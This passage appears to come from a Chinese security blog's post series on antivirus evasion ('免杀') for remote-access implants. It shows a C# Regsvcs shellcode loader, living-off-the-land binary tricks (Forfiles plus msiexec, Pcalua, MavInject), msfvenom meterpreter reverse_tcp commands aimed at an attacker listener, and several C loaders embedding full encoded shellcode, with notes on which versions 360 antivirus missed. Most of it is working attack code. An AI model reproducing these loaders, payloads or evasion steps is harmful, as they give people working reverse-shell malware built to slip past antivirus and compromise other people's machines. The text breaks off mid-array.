code</span><br><span class="line"></span><br><span class="line">            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);</span><br><span class="line">            WaitForSingleObject(hThread, 0xFFFFFFFF);</span><br><span class="line">            return;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        private static UInt32 MEM_COMMIT = 0x1000;</span><br><span class="line"></span><br><span class="line">        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;</span><br><span class="line"></span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,</span><br><span class="line">             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern IntPtr CreateThread(</span><br><span class="line"></span><br><span class="line">          UInt32 lpThreadAttributes,</span><br><span class="line">          UInt32 dwStackSize,</span><br><span class="line">          UInt32 lpStartAddress,</span><br><span class="line">          IntPtr param,</span><br><span class="line">          UInt32 dwCreationFlags,</span><br><span class="line">          ref UInt32 lpThreadId</span><br><span class="line"></span><br><span class="line">          );</span><br><span class="line"></span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 WaitForSingleObject(</span><br><span class="line"></span><br><span class="line">          IntPtr hHandle,</span><br><span class="line">          UInt32 dwMilliseconds</span><br><span class="line">          );</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用<code>csc.exe</code>将cs文件生成为dll文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs</span><br></pre></td></tr></table></figure>

<p>msf配置好监听，Regasm.exe/Regsvcs.exe执行恶意dll文件即可</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe 1.dll</span><br><span class="line">或</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe 1.dll</span><br></pre></td></tr></table></figure>

<h2 id="MavInject-exe"><a href="#MavInject-exe" class="headerlink" title="MavInject.exe"></a>MavInject.exe</h2><p>MavInject32.exe是微软应⽤程序虚拟化的⼀部分，可以直接完成向某⼀进程注⼊代码的功能</p>
<h2 id="Forfiles-exe"><a href="#Forfiles-exe" class="headerlink" title="Forfiles.exe"></a>Forfiles.exe</h2><p>Forfiles是⼀款windows平台默认安装的⽂件操作搜索⼯具之⼀，可以通过⽂件名称，修改⽇期等条件选择⽂件并运⾏⼀个命令来操作⽂件。它可以直接在命令⾏中使⽤，也可以在批处理⽂件或其他脚本中使⽤</p>
<p>生成msi payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f msi &gt; test.txt</span><br></pre></td></tr></table></figure>

<p>执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">forfiles /p c:\windows\system32 /m cmd.exe /c &quot;msiexec.exe /q /i C:\test\test.txt&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223094748821.png" alt="image-20220223094748821"></p>
<p>360直接报毒</p>
<h2 id="Pcalua-exe"><a href="#Pcalua-exe" class="headerlink" title="Pcalua.exe"></a>Pcalua.exe</h2><p>Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的⼀个组件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">pcalua.exe -a exe/bat/dll </span><br></pre></td></tr></table></figure>

<p>测试过程中未做处理的木马没等运行就被删了，建议提前做点免杀处理</p>
<h2 id="presentationhost-exe"><a href="#presentationhost-exe" class="headerlink" title="presentationhost.exe"></a>presentationhost.exe</h2><p>Presentationhost.exe是⼀个内置的Windows可执⾏⽂件，⽤于运⾏XAML浏览器应⽤程序（即.xbap⽂件）</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Presentationhost.exe C:\temp\Evil.xbap</span><br></pre></td></tr></table></figure>

<p>行为预警</p>
<h2 id="SyncAppvPublishingServer-vbs"><a href="#SyncAppvPublishingServer-vbs" class="headerlink" title="SyncAppvPublishingServer.vbs"></a>SyncAppvPublishingServer.vbs</h2><p>环境缺失</p>
<h2 id="MavInject32-exe"><a href="#MavInject32-exe" class="headerlink" title="MavInject32.exe"></a>MavInject32.exe</h2><p>MavInject32.exe是微软应⽤程序虚拟化的⼀部分，可以直接完成向某⼀进程注⼊代码的功能</p>
<p>使用方式</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">MavInject32.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</span><br></pre></td></tr></table></figure>

<p>Win7中没有发现该文件，自己的Win10中也没找到，还得看具体情况</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这段时间主要是看重剑无锋师傅的远控免杀系列文章结合从网上搜到的各种资料来学习，现在顶多算入门水平</p>
<p>自己测试复现下来部分方法的免杀效果和文章中还是有出入，还有很多方法因为奇奇怪怪的问题没有复现成功，也发了几次邮件给作者请教还未得到答复，未来对于远控免杀技术有了更深的理解后可能会重新整理一遍这几篇小破文或者重写一遍</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>LOLBAS：<a href="https://lolbas-project.github.io/#">https://lolbas-project.github.io/#</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>免杀</tag>
      </tags>
  </entry>
  <entry>
    <title>远控免杀——编译篇</title>
    <url>/2022/02/22/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E7%BC%96%E8%AF%91%E7%AF%87/</url>
    <content><![CDATA[<h1 id="远控免杀——编译篇"><a href="#远控免杀——编译篇" class="headerlink" title="远控免杀——编译篇"></a>远控免杀——编译篇</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>上一篇是利用各种工具进行免杀，其中很多工具涉及到对shellcode进行混淆编码的操作处理，接着用python、ruby、C/C++等语言进行编译加载</p>
<span id="more"></span>

<h2 id="C-C"><a href="#C-C" class="headerlink" title="C/C++"></a>C/C++</h2><h3 id="方法"><a href="#方法" class="headerlink" title="方法"></a>方法</h3><ol>
<li>使用加载器加载C/C++代码</li>
<li>C/C++源码 + Shellcode直接编译生成，执行Shellcode的方式有：指针执行、汇编指令执行、申请动态内存等</li>
</ol>
<h3 id="指针执行"><a href="#指针执行" class="headerlink" title="指针执行"></a>指针执行</h3><p>msfvenom生成C语言shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b &#x27;\x00&#x27; lhost=192.168.221.128 lport=4444 -f c -o shell.c</span><br></pre></td></tr></table></figure>

<p>用vs自行编译</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> buf[] =</span><br><span class="line"><span class="string">&quot;\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60&quot;</span></span><br><span class="line"><span class="string">&quot;\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44&quot;</span></span><br><span class="line"><span class="string">&quot;\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71&quot;</span></span><br><span class="line"><span class="string">&quot;\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73&quot;</span></span><br><span class="line"><span class="string">&quot;\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0&quot;</span></span><br><span class="line"><span class="string">&quot;\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60&quot;</span></span><br><span class="line"><span class="string">&quot;\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2&quot;</span></span><br><span class="line"><span class="string">&quot;\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a&quot;</span></span><br><span class="line"><span class="string">&quot;\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6&quot;</span></span><br><span class="line"><span class="string">&quot;\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e&quot;</span></span><br><span class="line"><span class="string">&quot;\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf&quot;</span></span><br><span class="line"><span class="string">&quot;\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69&quot;</span></span><br><span class="line"><span class="string">&quot;\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe&quot;</span></span><br><span class="line"><span class="string">&quot;\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f&quot;</span></span><br><span class="line"><span class="string">&quot;\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52&quot;</span></span><br><span class="line"><span class="string">&quot;\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83&quot;</span></span><br><span class="line"><span class="string">&quot;\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87&quot;</span></span><br><span class="line"><span class="string">&quot;\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba&quot;</span></span><br><span class="line"><span class="string">&quot;\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce&quot;</span></span><br><span class="line"><span class="string">&quot;\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2&quot;</span></span><br><span class="line"><span class="string">&quot;\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4&quot;</span></span><br><span class="line"><span class="string">&quot;\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e&quot;</span></span><br><span class="line"><span class="string">&quot;\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16&quot;</span></span><br><span class="line"><span class="string">&quot;\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54&quot;</span></span><br><span class="line"><span class="string">&quot;\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67&quot;</span></span><br><span class="line"><span class="string">&quot;\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58&quot;</span></span><br><span class="line"><span class="string">&quot;\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c&quot;</span></span><br><span class="line"><span class="string">&quot;\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd&quot;</span></span><br><span class="line"><span class="string">&quot;\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80&quot;</span></span><br><span class="line"><span class="string">&quot;\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf&quot;</span></span><br><span class="line"><span class="string">&quot;\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09&quot;</span></span><br><span class="line"><span class="string">&quot;\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54&quot;</span></span><br><span class="line"><span class="string">&quot;\x46\x6f\x80\x09\xda\xe1&quot;</span>;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(linker, <span class="meta-string">&quot;/subsystem:\&quot;Windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span>)</span></span><br><span class="line"><span class="comment">//windows控制台程序不出黑窗口</span></span><br><span class="line">main()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">	((<span class="keyword">void</span>(*)(<span class="keyword">void</span>)) &amp; buf)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221110611772.png" alt="image-20220221110611772"></p>
<p>还没运行文件过了两分钟就被查杀了</p>
<h3 id="申请动态内存"><a href="#申请动态内存" class="headerlink" title="申请动态内存"></a>申请动态内存</h3><p>申请动态内存并加载shellcode，shellcode代码同上</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(linker,<span class="meta-string">&quot;/subsystem:\&quot;Windows\&quot; /entry:\&quot;mainCRTStartup\&quot;&quot;</span>)</span></span><br><span class="line"><span class="comment">//windows控制台程序不出黑窗口</span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> buf[] = </span><br><span class="line"><span class="string">&quot;\xd9\xc2\xd9\x74\x24\xf4\xb8\x8f\xd6\xe6\xb7\x5b\x33\xc9\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\x7b\x31\x43\x18\x03\x43\x18\x83\xeb\x73\x34\x13\x6e\x40\x60&quot;</span></span><br><span class="line"><span class="string">&quot;\xa8\xb5\xa2\x2c\x5a\x5d\x63\x10\x05\x92\xba\x27\xc1\xe5\x44&quot;</span></span><br><span class="line"><span class="string">&quot;\x51\xa9\xee\x48\x62\xd5\xfb\x59\x7b\xd1\x87\xcb\x79\xd5\x71&quot;</span></span><br><span class="line"><span class="string">&quot;\xbd\xa6\x40\xa4\x13\x2b\xe2\x48\xb8\x75\xbb\x03\xef\xab\x73&quot;</span></span><br><span class="line"><span class="string">&quot;\xb9\x69\xf2\x18\x45\xf5\x82\x87\x2d\xc3\xaa\x59\xb4\x3c\xc0&quot;</span></span><br><span class="line"><span class="string">&quot;\xa6\x9a\xe6\x20\x17\x8c\xc0\x87\xc8\x6a\xcb\xb3\xb2\x1f\x60&quot;</span></span><br><span class="line"><span class="string">&quot;\x0b\x8a\x8c\x5f\xba\x08\xac\x2a\x1c\x2d\x9e\x1e\x0d\x29\xf2&quot;</span></span><br><span class="line"><span class="string">&quot;\xf1\x83\xdb\xf4\xf8\xdb\xd9\x56\x9c\x51\x2d\x70\xe7\xa6\x9a&quot;</span></span><br><span class="line"><span class="string">&quot;\x4a\x5e\xd5\x05\x16\x25\x2a\x80\xf3\xd7\xe1\xc6\xae\xef\xe6&quot;</span></span><br><span class="line"><span class="string">&quot;\xb5\x7e\x0e\x1a\x89\x9d\x47\x33\x6a\xc4\x4d\x53\x72\x12\x8e&quot;</span></span><br><span class="line"><span class="string">&quot;\xc9\x1c\xe1\x9e\xee\xeb\x0b\x7a\x5d\x1b\xa7\x79\x4e\xbb\xcf&quot;</span></span><br><span class="line"><span class="string">&quot;\xbe\xee\x9b\x92\x71\x37\x90\x10\xf9\x3e\x47\x7b\x85\xc1\x69&quot;</span></span><br><span class="line"><span class="string">&quot;\x08\xd0\xbd\x3e\x39\xab\x3c\x46\xa8\x1a\x0e\xa8\xa8\x5a\xfe&quot;</span></span><br><span class="line"><span class="string">&quot;\x2a\x44\x35\x2d\x26\x83\x4c\xbb\x7f\x30\xe9\xee\xc5\x46\x7f&quot;</span></span><br><span class="line"><span class="string">&quot;\xa9\x32\x31\x92\x3c\xfc\x36\x12\xde\x35\xff\xad\xa9\x53\x52&quot;</span></span><br><span class="line"><span class="string">&quot;\x61\xfe\xdf\x86\xb9\xb8\xc0\xc3\xa2\x11\x61\xcd\xd9\x3e\x83&quot;</span></span><br><span class="line"><span class="string">&quot;\xae\x0c\x8b\x30\x3e\x9f\xb8\x6a\x9e\xc6\x5f\x44\xa6\x63\x6b&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\x38\x5c\x5e\x77\xcd\x5a\xa3\xe9\x7e\x60\xbc\x15\xc8\x87&quot;</span></span><br><span class="line"><span class="string">&quot;\x50\x76\x71\x76\xc9\xd4\x2d\xfe\xa2\x91\x3f\x97\x5b\xd2\xba&quot;</span></span><br><span class="line"><span class="string">&quot;\x4f\x97\xdf\xf0\x2c\xa9\xfd\x6f\x17\x11\x94\x8e\xb9\xca\xce&quot;</span></span><br><span class="line"><span class="string">&quot;\x7d\xf4\xe3\xc2\xd7\x72\x67\x23\x55\x2e\xdc\x47\x97\xae\xa2&quot;</span></span><br><span class="line"><span class="string">&quot;\xc6\x17\x59\xc2\xa2\xfa\x95\xb4\x4e\xb0\x23\x37\x56\x71\xc4&quot;</span></span><br><span class="line"><span class="string">&quot;\x7a\xcb\xfb\xfe\xa2\xe4\x32\xa1\x30\x2a\x44\x34\x4d\x67\x9e&quot;</span></span><br><span class="line"><span class="string">&quot;\x91\xcf\x03\x59\x67\x33\xf7\xae\x80\x76\x49\x73\x36\xdf\x16&quot;</span></span><br><span class="line"><span class="string">&quot;\x69\x99\x80\x24\x0d\x17\xaf\x92\x2b\x41\x86\xf8\x45\xdb\x54&quot;</span></span><br><span class="line"><span class="string">&quot;\x7f\x74\x2c\x5b\xc0\x2f\x33\x26\x0e\xa9\xfc\xe4\xcf\x5b\x67&quot;</span></span><br><span class="line"><span class="string">&quot;\xf6\x06\x43\x14\x15\x71\xf6\xaf\x3c\x51\x57\x13\x57\x04\x58&quot;</span></span><br><span class="line"><span class="string">&quot;\x2d\xd7\x6f\x6e\xb5\x16\x07\x30\x99\xf9\x64\x0b\x5c\x10\x0c&quot;</span></span><br><span class="line"><span class="string">&quot;\x90\x72\x44\x08\xc3\x59\x91\x25\xb8\xda\x49\x93\x0b\xea\xcd&quot;</span></span><br><span class="line"><span class="string">&quot;\x2d\xb6\xb0\xdb\xaf\xa0\x9b\x0e\x8f\x78\x44\x04\xb2\x25\x80&quot;</span></span><br><span class="line"><span class="string">&quot;\x44\xa0\xb4\x9a\x23\xce\x05\x3d\xbb\xe8\xc0\x36\xf3\x48\xcf&quot;</span></span><br><span class="line"><span class="string">&quot;\xa7\xe8\xfe\x74\x4a\x25\xa7\x18\x0f\x37\xdb\x25\x3f\xa2\x09&quot;</span></span><br><span class="line"><span class="string">&quot;\x16\x1e\x06\xb9\xc1\x58\xd6\xcf\xf4\x7b\x26\x84\x21\x54\x54&quot;</span></span><br><span class="line"><span class="string">&quot;\x46\x6f\x80\x09\xda\xe1&quot;</span>;</span><br><span class="line">main()</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">char</span> *Memory; </span><br><span class="line"> Memory=VirtualAlloc(<span class="literal">NULL</span>, <span class="keyword">sizeof</span>(buf), MEM_COMMIT | MEM_RESERVE,</span><br><span class="line">PAGE_EXECUTE_READWRITE);</span><br><span class="line"><span class="built_in">memcpy</span>(Memory, buf, <span class="keyword">sizeof</span>(buf));</span><br><span class="line"> ((<span class="keyword">void</span>(*)())Memory)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221111130208.png" alt="image-20220221111130208"></p>
<p>结果和上面一样，刚传进去扫描没报毒，过一会就被查杀了</p>
<h3 id="嵌入汇编加载"><a href="#嵌入汇编加载" class="headerlink" title="嵌入汇编加载"></a>嵌入汇编加载</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">pragma</span> comment(linker, <span class="meta-string">&quot;/section:.data,RWE&quot;</span>)</span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> shellcode[] =</span><br><span class="line"><span class="string">&quot;\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9&quot;</span></span><br><span class="line"><span class="string">&quot;\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b&quot;</span></span><br><span class="line"><span class="string">&quot;\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb&quot;</span></span><br><span class="line"><span class="string">&quot;\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2&quot;</span></span><br><span class="line"><span class="string">&quot;\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed&quot;</span></span><br><span class="line"><span class="string">&quot;\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75&quot;</span></span><br><span class="line"><span class="string">&quot;\xc6\x95\xd3\x71\x15\xb9\xcf\x88\xaf\x3f\x0b\x5a\x3d\x03\x11&quot;</span></span><br><span class="line"><span class="string">&quot;\xd6\xdf\x2c\x80\x7d\x5b\x26\x0d\x76\x6d\x4e\xe7\xa7\xe2\x89&quot;</span></span><br><span class="line"><span class="string">&quot;\x41\xf2\x25\x60\x1c\x66\x0d\x71\x99\xff\x73\x11\xbe\x6b\x23&quot;</span></span><br><span class="line"><span class="string">&quot;\xed\x4b\x58\xaf\xa4\x88\x07\xbf\x32\x60\x82\xf3\x0f\x05\xb2&quot;</span></span><br><span class="line"><span class="string">&quot;\x42\x28\x3b\x1f\x2a\xd4\x15\x7c\xa8\x06\xcf\xb1\x31\x0b\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\x85\x26\xd6\x2b\x23\x44\xad\x50\x75\xad\x1c\xe9\x88\x5c\x32&quot;</span></span><br><span class="line"><span class="string">&quot;\x88\xc4\x83\x22\x2e\x18\x92\x93\x33\x8d\x2e\xba\xbf\xa8\x04&quot;</span></span><br><span class="line"><span class="string">&quot;\xbb\x51\x01\x45\x9b\x97\xdc\x15\xb0\xbb\x7c\x08\x27\x7a\x1f&quot;</span></span><br><span class="line"><span class="string">&quot;\x19\x4f\x3c\x2a\x04\x1e\xe4\xe6\x3e\x49\x33\xd7\x18\x95\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\x17\x6b\x9f\xd6\x31\x20\x1b\x7a\x77\x7b\x53\xbf\x98\x9c\x9c&quot;</span></span><br><span class="line"><span class="string">&quot;\xe7\x7c\x9c\xaa\x09\x38\xdd\x97\x40\x0a\x5e\x5f\x45\xcc\xf8&quot;</span></span><br><span class="line"><span class="string">&quot;\xc8\xd4\x35\x21\x7a\x6b\xa0\x57\x2b\xb6\xd5\x14\x3c\xbd\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\xa0\x2f\x48\x12\xa4\x79\x3f\xf9\x4e\x47\xc2\x85\x61\x97\x15&quot;</span></span><br><span class="line"><span class="string">&quot;\x37\x21\x3c\xb9\x11\x27\x6a\x4f\x80\xc5\x94\x41\xde\x05\x93&quot;</span></span><br><span class="line"><span class="string">&quot;\xa4\xce\xc6\xd9\xf0\x0c\x61\xdf\x98\x98\xd4\x88\x8a\xe5\x2c&quot;</span></span><br><span class="line"><span class="string">&quot;\xcb\x99\x6f\x91\x37\xd8\xc9\x98\x82\xca\x95\x27\xa8\xff\x62&quot;</span></span><br><span class="line"><span class="string">&quot;\x8e\xb8\xfa\x73\xa0\xd8\xb5\x6e\x40\x0c\x4a\xdd\x5f\x74\x7b&quot;</span></span><br><span class="line"><span class="string">&quot;\x6a\x57\x04\xce\x47\x4e\x3c\x7d\xea\x0a\xd7\x41\x05\x22\xf0&quot;</span></span><br><span class="line"><span class="string">&quot;\xa8\x24\xed\x65\xc7\xa1\xc4\xca\xea\x1f\x0c\xaf\x71\x63\x4c&quot;</span></span><br><span class="line"><span class="string">&quot;\x92\x8f\xc9\x44\x87\xb5\x69\x9c\x4b\xb1\x2b\x24\x7b\xe0\xe4&quot;</span></span><br><span class="line"><span class="string">&quot;\x06\x88\xaf\x3d\xb0\x8d\xca\x4f\xda\xba\xac\x86\x58\xf9\x41&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\xc7\x4f\x45\x78\x0b\x3c\xb6\xe7\x4f\x0b\x98\x88\x0b\x66&quot;</span></span><br><span class="line"><span class="string">&quot;\xdf\xc8\x8b\xf8\x1b\x28\x28\x3e\x47\xa1\xf1\x10\xe3\x15\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x65\xeb\x95\xb1\x5a\x99\x44\x13\xac\xc2\x1b\x5d\x8a\xbf\x97&quot;</span></span><br><span class="line"><span class="string">&quot;\x0a\xc3\xc9\x11\xdd\x40\x54\x16\x18\xf5\x95\x9d\x40\xd2\x9b&quot;</span></span><br><span class="line"><span class="string">&quot;\x71\xfe\xa2\x40\x31\xd5\x31\x99\xc9\xcd\xe1\xd2\x73\x59\xf6&quot;</span></span><br><span class="line"><span class="string">&quot;\xbe\x89\x55\xf4\x30\x8a&quot;</span>;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> __asm</span><br><span class="line"> &#123;</span><br><span class="line"> </span><br><span class="line"> mov eax, offset shellcode</span><br><span class="line"> jmp eax</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>shellcode重新生成了一次，编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221112241097.png" alt="image-20220221112241097"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221112310479.png" alt="image-20220221112310479"></p>
<p>msf正常上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221111720866.png" alt="image-20220221111720866"></p>
<p>360静态动态均没有查杀</p>
<p>PS：win7中运行如果出现 <code>vcruntime140D.dll丢失</code> 报错，可以修改运行库为<code>多线程(/MT)</code>，默认是MTD</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221112445023.png" alt="image-20220221112445023"></p>
<h3 id="强制类型转换"><a href="#强制类型转换" class="headerlink" title="强制类型转换"></a>强制类型转换</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> buf[] =</span><br><span class="line"><span class="string">&quot;\xbf\xf3\x8d\xa9\x93\xdb\xdc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1&quot;</span></span><br><span class="line"><span class="string">&quot;\x7b\x83\xea\xfc\x31\x7a\x0f\x03\x7a\xfc\x6f\x5c\x49\xdc\xa9&quot;</span></span><br><span class="line"><span class="string">&quot;\xeb\x4a\x14\xf3\xbe\x37\xda\x1c\xe7\x06\x2b\xad\x63\xea\x6b&quot;</span></span><br><span class="line"><span class="string">&quot;\xca\xba\xbc\x7e\xd0\xec\x29\xc8\x87\xbc\x57\x56\x43\x43\xbb&quot;</span></span><br><span class="line"><span class="string">&quot;\x38\xcd\xce\x6f\x6e\xe0\x75\x8a\x8d\x44\xed\xe1\x47\xf8\xa2&quot;</span></span><br><span class="line"><span class="string">&quot;\x90\xfc\x52\x14\x37\x71\x51\x05\x4e\x90\x97\x8b\xaf\xd9\x2a&quot;</span></span><br><span class="line"><span class="string">&quot;\x99\x5d\xa1\x39\x15\x30\x73\xe6\x82\x51\x9c\x80\x32\xbe\xed&quot;</span></span><br><span class="line"><span class="string">&quot;\x56\x51\xbd\xf0\xa7\x99\x93\xd8\x7a\x89\x69\xde\x5c\xc9\x75&quot;</span></span><br><span class="line"><span 